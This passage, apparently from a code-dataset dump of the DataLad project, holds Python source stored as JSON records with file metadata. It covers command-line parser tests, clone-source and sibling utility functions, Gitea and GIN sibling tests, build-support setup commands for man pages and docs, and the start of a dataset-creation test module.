that we do not duplicate sections\n # and our USAGE summary has only [global-opts]\n assert re.match(r\"Usage: .*datalad.* \\[global-opts\\] command \\[command-opts\\]\", stdout)\n assert stdout.count(' -c ') == 1\n\n assert_all_commands_present(stdout)\n\n if not get_terminal_size()[0] or 0:\n raise SkipTest(\n \"Could not determine terminal size, skipping the rest of the test\")\n\n # none of the lines must be longer than 80 chars\n # TODO: decide on create-sibling and possibly\n # rewrite-urls\n accepted_width = get_console_width()\n\n long_lines = [\"%d %s\" % (len(l), l) for l in stdout.split('\\n')\n if len(l) > accepted_width and\n '{' not in l # on nd70 summary line is unsplit\n ]\n if long_lines:\n raise AssertionError(\n \"Following lines in --help output were longer than %s chars:\\n%s\"\n % (accepted_width, '\\n'.join(long_lines))\n )\n\n\ndef test_dashh():\n stdout, stderr = run_main(['-h'])\n # Note: for -h we do not do ad-hoc tune up of Usage: to guarantee having\n # datalad instead of python -m nose etc, so we can only verify that we have\n # options listed\n assert_re_in(r'^Usage: .*\\[', stdout.splitlines()[0])\n assert_all_commands_present(stdout)\n assert_re_in('Use .--help. to get more comprehensive information', stdout.splitlines())\n\n\ndef test_dashh_clone():\n # test -h on a sample command\n stdout, stderr = run_main(['clone', '-h'])\n assert_re_in(r'^Usage: .* clone \\[', stdout.splitlines()[0])\n assert_re_in('Use .--help. to get more comprehensive information', stdout.splitlines())\n\n\ndef test_usage_on_insufficient_args():\n stdout, stderr = run_main(['install'], exit_code=2, expect_stderr=True)\n ok_startswith(stderr, 'usage:')\n\n\ndef test_subcmd_usage_on_unknown_args():\n stdout, stderr = run_main(['get', '--murks'], exit_code=1, expect_stderr=True)\n in_('get', stdout)\n\n\ndef test_combined_short_option():\n stdout, stderr = run_main(['-fjson'], exit_code=2, expect_stderr=True)\n assert_not_in(\"unrecognized argument\", stderr)\n assert_in(\"too few arguments\", stderr)\n\n\n# https://github.com/datalad/datalad/issues/6814\n@with_tempfile(mkdir=True)\ndef test_conflicting_short_option(tempdir=None):\n # datalad -f|--format requires a value. 
regression made parser ignore command\n # and its options\n with chpwd(tempdir): # can't just use -C tempdir since we do \"in process\" run_main\n run_main(['create', '-f'])\n\n\n# apparently a bit different if following a good one so let's do both\nerr_invalid = \"error: (invalid|too few arguments|unrecognized argument)\"\nerr_insufficient = err_invalid # \"specify\"\n\n\[email protected](\n \"opts,err_str\",\n [\n (('--buga',), err_invalid),\n (('--dbg', '--buga'), err_invalid),\n (('--dbg',), err_insufficient),\n (tuple(), err_insufficient),\n ]\n)\ndef test_incorrect_option(opts, err_str):\n # The first line used to be:\n # stdout, stderr = run_main((sys.argv[0],) + opts, expect_stderr=True, exit_code=2)\n # But: what do we expect to be in sys.argv[0] here?\n # It depends on how we invoke the test.\n # - nosetests -s -v datalad/cmdline/tests/test_main.py would result in:\n # sys.argv[0}=='nosetests'\n # - python -m nose -s -v datalad/cmdline/tests/test_main.py would result in:\n # sys.argv[0}=='python -m nose'\n # - python -c \"import nose; nose.main()\" -s -v datalad/cmdline/tests/test_main.py would result in:\n # sys.argv[0]=='-c'\n # This led to failure in case sys.argv[0] contained an option, that was\n # defined to be a datalad option too, therefore was a 'known_arg' and was\n # checked to meet its constraints.\n # But sys.argv[0] actually isn't used by main at all. It simply doesn't\n # matter what's in there. The only thing important to pass here is `opts`.\n stdout, stderr = run_main(opts, expect_stderr=True, exit_code=2)\n out = stdout + stderr\n assert_in(\"usage: \", out)\n assert_re_in(err_str, out, match=False)\n\n\[email protected](\n \"script\",\n [\n 'datalad',\n 'git-annex-remote-datalad-archives',\n 'git-annex-remote-datalad',\n ]\n)\ndef test_script_shims(script):\n runner = Runner()\n if not on_windows:\n\n from shutil import which\n which(script)\n\n # and let's check that it is our script\n out = runner.run([script, '--version'], protocol=StdOutErrCapture)\n version = out['stdout'].rstrip()\n mod, version = version.split(' ', 1)\n assert_equal(mod, 'datalad')\n # we can get git and non git .dev version... so for now\n # relax\n get_numeric_portion = lambda v: [x for x in re.split('[+.]', v) if x.isdigit()]\n # extract numeric portion\n assert get_numeric_portion(version), f\"Got no numeric portion from {version}\"\n assert_equal(get_numeric_portion(__version__),\n get_numeric_portion(version))\n\n\n@with_tempfile(mkdir=True)\ndef test_cfg_override(path=None):\n with chpwd(path):\n # use 'wtf' to dump the config\n # should be rewritten to use `configuration`\n cmd = ['datalad', 'wtf', '-S', 'configuration', '-s', 'some']\n # control\n out = Runner().run(cmd, protocol=StdOutErrCapture)['stdout']\n assert_not_in('datalad.dummy: this', out)\n # ensure that this is not a dataset's cfg manager\n assert_not_in('datalad.dataset.id', out)\n # env var\n out = Runner(env=dict(os.environ, DATALAD_DUMMY='this')).run(\n cmd, protocol=StdOutErrCapture)['stdout']\n assert_in('datalad.dummy: this', out)\n # cmdline arg\n out = Runner().run([cmd[0], '-c', 'datalad.dummy=this'] + cmd[1:],\n protocol=StdOutErrCapture)['stdout']\n assert_in('datalad.dummy: this', out)\n\n # now create a dataset in the path. 
the wtf plugin will switch to\n # using the dataset's config manager, which must inherit the overrides\n create(dataset=path, annex=False)\n # control\n out = Runner().run(cmd, protocol=StdOutErrCapture)['stdout']\n assert_not_in('datalad.dummy: this', out)\n # ensure that this is a dataset's cfg manager\n assert_in('datalad.dataset.id', out)\n # env var\n out = Runner(env=dict(os.environ, DATALAD_DUMMY='this')).run(\n cmd, protocol=StdOutErrCapture)['stdout']\n assert_in('datalad.dummy: this', out)\n # cmdline arg\n out = Runner().run([cmd[0], '-c', 'datalad.dummy=this'] + cmd[1:],\n protocol=StdOutErrCapture)['stdout']\n assert_in('datalad.dummy: this', out)\n\n # set a config\n run_main([\n 'configuration', '--scope', 'local', 'set', 'mike.item=some'])\n # verify it is successfully set\n assert 'some' == run_main([\n 'configuration', 'get', 'mike.item'])[0].strip()\n # verify that an override can unset the config\n # we cannot use run_main(), because the \"singleton\" instance of the\n # dataset we are in is still around in this session, and with it\n # also its config managers that we will not be able to post-hoc\n # overwrite with this method. Instead, we'll execute in a subprocess.\n assert '' == Runner().run([\n 'datalad', '-c', ':mike.item',\n 'configuration', 'get', 'mike.item'],\n protocol=StdOutErrCapture)['stdout'].strip()\n # verify the effect is not permanent\n assert 'some' == Runner().run([\n 'datalad',\n 'configuration', 'get', 'mike.item'],\n protocol=StdOutErrCapture)['stdout'].strip()\n\n\ndef test_incorrect_cfg_override():\n run_main(['-c', 'some', 'wtf'], exit_code=3)\n run_main(['-c', 'some=', 'wtf'], exit_code=3)\n run_main(['-c', 'some.var', 'wtf'], exit_code=3)\n run_main(['-c', 'some.var=', 'wtf'], exit_code=3)\n\n\n@with_tempfile\ndef test_librarymode(path=None):\n Dataset(path).create()\n was_mode = datalad.__runtime_mode\n try:\n # clean --dry-run is just a no-op command that is cheap\n # to execute. 
It has no particular role here, other than\n # to make the code pass the location where library mode\n # should be turned on via the cmdline API\n run_main(['-c', 'datalad.runtime.librarymode=yes', 'clean',\n '-d', path, '--dry-run'])\n ok_(datalad.in_librarymode())\n finally:\n # restore pre-test behavior\n datalad.__runtime_mode = was_mode\n datalad.cfg.overrides.pop('datalad.runtime.librarymode')\n\n\n@with_tempfile\ndef test_completion(out_fn=None):\n skip_if_no_module('argcomplete')\n\n from datalad.cmd import WitlessRunner\n runner = WitlessRunner()\n\n def get_completions(s: str, expected) -> list:\n \"\"\"Run 'datalad' external command and collect completions\n\n Parameters\n ----------\n s: str\n what to append to 'datalad ' invocation\n expected: iterable of str\n What entries to expect - would raise AssertionError if any is\n not present in output\n exit_code: int, optional\n If incomplete/malformed we seems to get 2, most frequently used\n so default\n\n Returns\n -------\n list of str\n Entries output\n \"\"\"\n if os.path.exists(out_fn): # reuse but ensure it is gone\n os.unlink(out_fn)\n comp_line = f'datalad {s}'\n runner.run(\n comp_line.split(' '),\n env=dict(os.environ,\n _ARGCOMPLETE='1',\n _ARGCOMPLETE_STDOUT_FILENAME=out_fn,\n COMP_LINE=comp_line,\n # without -1 seems to get \"finished completion\", someone can investigate more\n COMP_POINT=str(len(comp_line)-1), # always at the end ATM\n ))\n with open(out_fn, 'rb') as f:\n entries = f.read().split(b'\\x0b')\n entries = [e.decode() for e in entries]\n diff = set(expected).difference(entries)\n if diff:\n raise AssertionError(\n f\"Entries {sorted(diff)} were expected but not found in the completion output: {entries}\"\n )\n return entries # for extra analyzes if so desired\n\n all_commands = get_all_commands()\n get_completions('i', {'install'})\n get_completions(' ', ['--dbg', '-c'] + all_commands)\n # if command already matches -- we get only that hit ATM, not others which begin with it\n get_completions('create', ['create '])\n get_completions('create -', ['--dataset'])\n # but for incomplete one we do get all create* commands\n get_completions('creat', [c for c in all_commands if c.startswith('create')])\n" }, { "alpha_fraction": 0.5693232417106628, "alphanum_fraction": 0.5708745121955872, "avg_line_length": 30.066265106201172, "blob_id": "21970d73f6360a5b8bf598a885f89029545cb6be", "content_id": "3ef3ca4be07d45047f5f232e57ad4f83572eb244", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5157, "license_type": "permissive", "max_line_length": 87, "num_lines": 166, "path": "/datalad/distribution/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Distribution utility functions\n\n\"\"\"\n\nimport logging\n\nfrom os.path import (\n isabs,\n join as opj,\n normpath,\n)\nimport posixpath\nfrom datalad.log import log_progress\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.network import (\n PathRI,\n RI,\n URL,\n)\n\n\nlgr = logging.getLogger('datalad.distribution.utils')\n\n\ndef 
_get_flexible_source_candidates(src, base_url=None, alternate_suffix=True):\n \"\"\"Get candidates to try cloning from.\n\n Primarily to mitigate the problem that git doesn't append /.git\n while cloning from non-bare repos over dummy protocol (http*). Also to\n simplify creation of urls whenever base url and relative path within it\n provided\n\n Parameters\n ----------\n src : string or RI\n Full or relative (then considered within base_url if provided) path\n base_url : string or RI, optional\n alternate_suffix : bool\n Whether to generate URL candidates with and without '/.git' suffixes.\n\n Returns\n -------\n candidates : list of str\n List of RIs (path, url, ssh targets) to try to install from\n \"\"\"\n candidates = []\n\n ri = RI(src)\n if isinstance(ri, PathRI) and not isabs(ri.path) and base_url:\n ri = RI(base_url)\n if ri.path.endswith('/.git'):\n base_path = ri.path[:-5]\n base_suffix = '.git'\n else:\n base_path = ri.path\n base_suffix = ''\n if isinstance(ri, PathRI):\n # this is a path, so stay native\n ri.path = normpath(opj(base_path, src, base_suffix))\n else:\n # we are handling a URL, use POSIX path conventions\n ri.path = posixpath.normpath(\n posixpath.join(base_path, src, base_suffix))\n\n src = str(ri)\n\n candidates.append(src)\n if alternate_suffix and isinstance(ri, URL):\n if ri.scheme in {'http', 'https'}:\n # additionally try to consider .git:\n if not src.rstrip('/').endswith('/.git'):\n candidates.append(\n '{0}/.git'.format(src.rstrip('/')))\n\n return candidates\n\n\n\ndef _yield_ds_w_matching_siblings(\n ds, names, recursive=False, recursion_limit=None):\n \"\"\"(Recursively) inspect a dataset for siblings with particular name(s)\n\n Parameters\n ----------\n ds: Dataset\n The dataset to be inspected.\n names: iterable\n Sibling names (str) to test for.\n recursive: bool, optional\n Whether to recurse into subdatasets.\n recursion_limit: int, optional\n Recursion depth limit.\n\n Yields\n ------\n str, str\n Path to the dataset with a matching sibling, and name of the matching\n sibling in that dataset.\n \"\"\"\n\n def _discover_all_remotes(ds, refds, **kwargs):\n \"\"\"Helper to be run on all relevant datasets via foreach\n \"\"\"\n # Note, that `siblings` doesn't tell us about not enabled special\n # remotes. 
There could still be conflicting names we need to know\n # about in order to properly deal with the `existing` switch.\n\n repo = ds.repo\n # list of known git remotes\n if isinstance(repo, AnnexRepo):\n remotes = repo.get_remotes(exclude_special_remotes=True)\n remotes.extend([v['name']\n for k, v in repo.get_special_remotes().items()]\n )\n else:\n remotes = repo.get_remotes()\n return remotes\n\n if not recursive:\n for name in _discover_all_remotes(ds, ds):\n if name in names:\n yield ds.path, name\n return\n\n # in recursive mode this check could take a substantial amount of\n # time: employ a progress bar (or rather a counter, because we don't\n # know the total in advance\n pbar_id = 'check-siblings-{}'.format(id(ds))\n log_progress(\n lgr.info, pbar_id,\n 'Start checking pre-existing sibling configuration %s', ds,\n label='Query siblings',\n unit=' Siblings',\n )\n\n for res in ds.foreach_dataset(\n _discover_all_remotes,\n recursive=recursive,\n recursion_limit=recursion_limit,\n return_type='generator',\n result_renderer='disabled',\n ):\n # unwind result generator\n if 'result' in res:\n for name in res['result']:\n log_progress(\n lgr.info, pbar_id,\n 'Discovered sibling %s in dataset at %s',\n name, res['path'],\n update=1,\n increment=True)\n if name in names:\n yield res['path'], name\n\n log_progress(\n lgr.info, pbar_id,\n 'Finished checking pre-existing sibling configuration %s', ds,\n )\n" }, { "alpha_fraction": 0.4704112410545349, "alphanum_fraction": 0.5105316042900085, "avg_line_length": 30.15625, "blob_id": "51ab3d0c993097ec569d1ebf8ae2ddb1fcf1860b", "content_id": "4b10cee6896373d00d96385f62e8998cf0e11565", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "permissive", "max_line_length": 87, "num_lines": 32, "path": "/datalad/tests/test_misc.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom packaging.version import Version\n\nimport datalad\nfrom datalad.support.network import (\n get_url_response_stamp,\n is_url_quoted,\n)\n\nfrom .utils_pytest import *\n\n\ndef test_is_url_quoted():\n ok_(is_url_quoted('%22%27%3ba&b&cd|'))\n ok_(not is_url_quoted('a b'))\n\n\ndef test_get_response_stamp():\n r = get_url_response_stamp(\"http://www.example.com/1.dat\",\n {'Content-length': '101',\n 'Last-modified': 'Wed, 01 May 2013 03:02:00 GMT'})\n eq_(r['size'], 101)\n eq_(r['mtime'], 1367377320)\n eq_(r['url'], \"http://www.example.com/1.dat\")\n" }, { "alpha_fraction": 0.5237467288970947, "alphanum_fraction": 0.5316622853279114, "avg_line_length": 25.13793182373047, "blob_id": "57b3df74a3f57f091e16ae01d70096e305927a1e", "content_id": "d731e537e4df502ce4c7257d9b8abaedd7f57d92", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 758, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/datalad/distributed/tests/test_create_sibling_gitea.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### 
### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on Gitea\"\"\"\n\n\nfrom datalad.api import create_sibling_gitea\nfrom datalad.tests.utils_pytest import (\n skip_if_no_network,\n with_tempfile,\n)\n\nfrom .test_create_sibling_ghlike import check4real\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_gitea(path=None):\n check4real(\n create_sibling_gitea,\n path,\n 'gitea',\n 'https://try.gitea.io',\n 'api/v1/repos/dataladtester/{reponame}',\n )\n" }, { "alpha_fraction": 0.5452522039413452, "alphanum_fraction": 0.5504450798034668, "avg_line_length": 26.510204315185547, "blob_id": "4732fc99aaa5ad40c466af862db6b67e9e4de09b", "content_id": "43518ba53a79120e2e80ed5d25fb0642ac2b4635", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1348, "license_type": "permissive", "max_line_length": 79, "num_lines": 49, "path": "/datalad/distributed/tests/test_create_sibling_gin.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on GIN\"\"\"\n\n\nfrom datalad.api import create_sibling_gin\nfrom datalad.tests.utils_pytest import (\n assert_in_results,\n skip_if_no_network,\n with_tempfile,\n)\n\nfrom .test_create_sibling_ghlike import check4real\n\n\ndef check_push(ds):\n # create a file and push it to GIN to see of the\n # access is set up properly\n (ds.pathobj / 'file').write_text('some')\n ds.save()\n assert_in_results(\n ds.push(to='gin', result_renderer='disabled'),\n action='copy',\n status='ok',\n path=str(ds.pathobj / 'file')\n )\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_gin(path=None):\n check4real(\n create_sibling_gin,\n path,\n 'gin',\n 'https://gin.g-node.org',\n # when testing locally, you might want to use your\n # own GIN account to not have to fiddle with the key\n # setup\n #'api/v1/repos/mih/{reponame}',\n 'api/v1/repos/dataladtester/{reponame}',\n access_protocol='https-ssh',\n moretests=check_push,\n )\n" }, { "alpha_fraction": 0.5576720237731934, "alphanum_fraction": 0.5614365339279175, "avg_line_length": 34.800540924072266, "blob_id": "b8246292575051ad4be2b59738ca4b0c58912991", "content_id": "b845f5e045c7d0eb2936ccc57e26366683a50739", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13282, "license_type": "permissive", "max_line_length": 98, "num_lines": 371, "path": "/_datalad_build_support/setup.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\n\nimport datetime\nimport os\nimport platform\nimport sys\nfrom os import (\n linesep,\n makedirs,\n)\nfrom os.path import dirname\nfrom os.path import join as opj\nfrom os.path import sep as pathsep\nfrom 
os.path import splitext\n\nimport setuptools\nfrom genericpath import exists\nfrom packaging.version import Version\nfrom setuptools import (\n Command,\n DistutilsOptionError,\n find_namespace_packages,\n findall,\n setup,\n)\n\nfrom . import formatters as fmt\n\n\ndef _path_rel2file(*p):\n # dirname instead of joining with pardir so it works if\n # datalad_build_support/ is just symlinked into some extension\n # while developing\n return opj(dirname(dirname(__file__)), *p)\n\n\ndef get_version(name):\n \"\"\"Determine version via importlib_metadata\n\n Parameters\n ----------\n name: str\n Name of the folder (package) where from to read version.py\n \"\"\"\n # delay import so we do not require it for a simple setup stage\n try:\n from importlib.metadata import version as importlib_version\n except ImportError:\n # TODO - remove whenever python >= 3.8\n from importlib_metadata import version as importlib_version\n return importlib_version(name)\n\n\nclass BuildManPage(Command):\n # The BuildManPage code was originally distributed\n # under the same License of Python\n # Copyright (c) 2014 Oz Nahum Tiram <[email protected]>\n\n description = 'Generate man page from an ArgumentParser instance.'\n\n user_options = [\n ('manpath=', None, 'output path for manpages'),\n ('rstpath=', None, 'output path for RST files'),\n ('parser=', None, 'module path to an ArgumentParser instance'\n '(e.g. mymod:func, where func is a method or function which return'\n 'a dict with one or more arparse.ArgumentParser instances.'),\n ]\n\n def initialize_options(self):\n self.manpath = opj('build', 'man')\n self.rstpath = opj('docs', 'source', 'generated', 'man')\n self.parser = 'datalad.cli.parser:setup_parser'\n\n def finalize_options(self):\n if self.manpath is None:\n raise DistutilsOptionError('\\'manpath\\' option is required')\n if self.rstpath is None:\n raise DistutilsOptionError('\\'rstpath\\' option is required')\n if self.parser is None:\n raise DistutilsOptionError('\\'parser\\' option is required')\n self.manpath = _path_rel2file(self.manpath)\n self.rstpath = _path_rel2file(self.rstpath)\n mod_name, func_name = self.parser.split(':')\n fromlist = mod_name.split('.')\n try:\n mod = __import__(mod_name, fromlist=fromlist)\n self._parser = getattr(mod, func_name)(\n ['datalad'],\n formatter_class=fmt.ManPageFormatter,\n return_subparsers=True,\n help_ignore_extensions=True)\n\n except ImportError as err:\n raise err\n\n self.announce('Writing man page(s) to %s' % self.manpath)\n self._today = datetime.date.today()\n\n @classmethod\n def handle_module(cls, mod_name, **kwargs):\n \"\"\"Module specific handling.\n\n This particular one does\n 1. Memorize (at class level) the module name of interest here\n 2. 
Check if 'datalad.extensions' are specified for the module,\n and then analyzes them to obtain command names it provides\n\n If cmdline commands are found, its entries are to be used instead of\n the ones in datalad's _parser.\n\n Parameters\n ----------\n **kwargs:\n all the kwargs which might be provided to setuptools.setup\n \"\"\"\n cls.mod_name = mod_name\n\n exts = kwargs.get('entry_points', {}).get('datalad.extensions', [])\n for ext in exts:\n assert '=' in ext # should be label=module:obj\n ext_label, mod_obj = ext.split('=', 1)\n assert ':' in mod_obj # should be module:obj\n mod, obj = mod_obj.split(':', 1)\n assert mod_name == mod # AFAIK should be identical\n\n mod = __import__(mod_name)\n if hasattr(mod, obj):\n command_suite = getattr(mod, obj)\n assert len(command_suite) == 2 # as far as I see it\n if not hasattr(cls, 'cmdline_names'):\n cls.cmdline_names = []\n cls.cmdline_names += [\n cmd\n for _, _, cmd, _ in command_suite[1]\n ]\n\n def run(self):\n\n dist = self.distribution\n #homepage = dist.get_url()\n #appname = self._parser.prog\n appname = 'datalad'\n\n sections = {\n 'Authors': \"\"\"{0} is developed by {1} <{2}>.\"\"\".format(\n appname, dist.get_author(), dist.get_author_email()),\n }\n\n for cls, opath, ext in ((fmt.ManPageFormatter, self.manpath, '1'),\n (fmt.RSTManPageFormatter, self.rstpath, 'rst')):\n if not os.path.exists(opath):\n os.makedirs(opath)\n for cmdname in getattr(self, 'cmdline_names', list(self._parser)):\n p = self._parser[cmdname]\n cmdname = \"{0}{1}\".format(\n 'datalad ' if cmdname != 'datalad' else '',\n cmdname)\n format = cls(\n cmdname,\n ext_sections=sections,\n version=get_version(getattr(self, 'mod_name', appname)))\n formatted = format.format_man_page(p)\n with open(opj(opath, '{0}.{1}'.format(\n cmdname.replace(' ', '-'),\n ext)),\n 'w') as f:\n f.write(formatted)\n\n\nclass BuildRSTExamplesFromScripts(Command):\n description = 'Generate RST variants of example shell scripts.'\n\n user_options = [\n ('expath=', None, 'path to look for example scripts'),\n ('rstpath=', None, 'output path for RST files'),\n ]\n\n def initialize_options(self):\n self.expath = opj('docs', 'examples')\n self.rstpath = opj('docs', 'source', 'generated', 'examples')\n\n def finalize_options(self):\n if self.expath is None:\n raise DistutilsOptionError('\\'expath\\' option is required')\n if self.rstpath is None:\n raise DistutilsOptionError('\\'rstpath\\' option is required')\n self.expath = _path_rel2file(self.expath)\n self.rstpath = _path_rel2file(self.rstpath)\n self.announce('Converting example scripts')\n\n def run(self):\n opath = self.rstpath\n if not os.path.exists(opath):\n os.makedirs(opath)\n\n from glob import glob\n for example in glob(opj(self.expath, '*.sh')):\n exname = os.path.basename(example)[:-3]\n with open(opj(opath, '{0}.rst'.format(exname)), 'w') as out:\n fmt.cmdline_example_to_rst(\n open(example),\n out=out,\n ref='_example_{0}'.format(exname))\n\n\nclass BuildConfigInfo(Command):\n description = 'Generate RST documentation for all config items.'\n\n user_options = [\n ('rstpath=', None, 'output path for RST file'),\n ]\n\n def initialize_options(self):\n self.rstpath = opj('docs', 'source', 'generated', 'cfginfo')\n\n def finalize_options(self):\n if self.rstpath is None:\n raise DistutilsOptionError('\\'rstpath\\' option is required')\n self.rstpath = _path_rel2file(self.rstpath)\n self.announce('Generating configuration documentation')\n\n def run(self):\n opath = self.rstpath\n if not os.path.exists(opath):\n 
os.makedirs(opath)\n\n from datalad.dochelpers import _indent\n from datalad.interface.common_cfg import definitions as cfgdefs\n\n categories = {\n 'global': {},\n 'local': {},\n 'dataset': {},\n 'misc': {}\n }\n for term, v in cfgdefs.items():\n categories[v.get('destination', 'misc')][term] = v\n\n for cat in categories:\n with open(opj(opath, '{}.rst.in'.format(cat)), 'w') as rst:\n rst.write('.. glossary::\\n')\n for term, v in sorted(categories[cat].items(), key=lambda x: x[0]):\n rst.write(_indent(term, '\\n '))\n qtype, docs = v.get('ui', (None, {}))\n desc_tmpl = '\\n'\n if 'title' in docs:\n desc_tmpl += '{title}:\\n'\n if 'text' in docs:\n desc_tmpl += '{text}\\n'\n if 'default' in v:\n default = v['default']\n if hasattr(default, 'replace'):\n # protect against leaking specific home dirs\n v['default'] = default.replace(os.path.expanduser('~'), '~')\n desc_tmpl += 'Default: {default}\\n'\n if 'type' in v:\n type_ = v['type']\n if hasattr(type_, 'long_description'):\n type_ = type_.long_description()\n else:\n type_ = type_.__name__\n desc_tmpl += '\\n[{type}]\\n'\n v['type'] = type_\n if desc_tmpl == '\\n':\n # we need something to avoid joining terms\n desc_tmpl += 'undocumented\\n'\n v.update(docs)\n rst.write(_indent(desc_tmpl.format(**v), ' '))\n\n\ndef get_long_description_from_README():\n \"\"\"Read README.md, convert to .rst using pypandoc\n\n If pypandoc is not available or fails - just output original .md.\n\n Returns\n -------\n dict\n with keys long_description and possibly long_description_content_type\n for newer setuptools which support uploading of markdown as is.\n \"\"\"\n # PyPI used to not render markdown. Workaround for a sane appearance\n # https://github.com/pypa/pypi-legacy/issues/148#issuecomment-227757822\n # is still in place for older setuptools\n\n README = opj(_path_rel2file('README.md'))\n\n ret = {}\n if Version(setuptools.__version__) >= Version('38.6.0'):\n # check than this\n ret['long_description'] = open(README).read()\n ret['long_description_content_type'] = 'text/markdown'\n return ret\n\n # Convert or fall-back\n try:\n import pypandoc\n return {'long_description': pypandoc.convert(README, 'rst')}\n except (ImportError, OSError) as exc:\n # attempting to install pandoc via brew on OSX currently hangs and\n # pypandoc imports but throws OSError demanding pandoc\n print(\n \"WARNING: pypandoc failed to import or thrown an error while \"\n \"converting\"\n \" README.md to RST: %r .md version will be used as is\" % exc\n )\n return {'long_description': open(README).read()}\n\n\ndef findsome(subdir, extensions):\n \"\"\"Find files under subdir having specified extensions\n\n Leading directory (datalad) gets stripped\n \"\"\"\n return [\n f.split(pathsep, 1)[1] for f in findall(opj('datalad', subdir))\n if splitext(f)[-1].lstrip('.') in extensions\n ]\n\n\ndef datalad_setup(name, **kwargs):\n \"\"\"A helper for a typical invocation of setuptools.setup.\n\n If not provided in kwargs, following fields will be autoset to the defaults\n or obtained from the present on the file system files:\n\n - author\n - author_email\n - packages -- all found packages which start with `name`\n - long_description -- converted to .rst using pypandoc README.md\n - version -- parsed `__version__` within `name/version.py`\n\n Parameters\n ----------\n name: str\n Name of the Python package\n **kwargs:\n The rest of the keyword arguments passed to setuptools.setup as is\n \"\"\"\n # Simple defaults\n for k, v in {\n 'author': \"The DataLad Team and Contributors\",\n 
'author_email': \"[email protected]\"\n }.items():\n if kwargs.get(k) is None:\n kwargs[k] = v\n\n # More complex, requiring some function call\n\n # Only recentish versions of find_packages support include\n # packages = find_packages('.', include=['datalad*'])\n # so we will filter manually for maximal compatibility\n if kwargs.get('packages') is None:\n # Use find_namespace_packages() in order to include folders that\n # contain data files but no Python code\n kwargs['packages'] = [pkg for pkg in find_namespace_packages('.') if pkg.startswith(name)]\n if kwargs.get('long_description') is None:\n kwargs.update(get_long_description_from_README())\n\n cmdclass = kwargs.get('cmdclass', {})\n # Check if command needs some module specific handling\n for v in cmdclass.values():\n if hasattr(v, 'handle_module'):\n getattr(v, 'handle_module')(name, **kwargs)\n return setup(name=name, **kwargs)\n" }, { "alpha_fraction": 0.6104670166969299, "alphanum_fraction": 0.6170840859413147, "avg_line_length": 32.67587661743164, "blob_id": "9e69f8022756be12d69b58c7ead6d5024856a672", "content_id": "6757b599ecf5e851657e5378b82def01eb7eee71", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18286, "license_type": "permissive", "max_line_length": 101, "num_lines": 543, "path": "/datalad/core/local/tests/test_create.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create action\n\n\"\"\"\n\nimport os\nimport os.path as op\n\nimport pytest\n\nfrom datalad.api import create\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import CommandError\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_status,\n eq_,\n has_symlink_capability,\n ok_,\n ok_exists,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n)\n\n_dataset_hierarchy_template = {\n 'origin': {\n 'file1': '',\n # Add prefix to prevent DATALAD_TESTS_OBSCURE_PREFIX=- from working as\n # intended. 
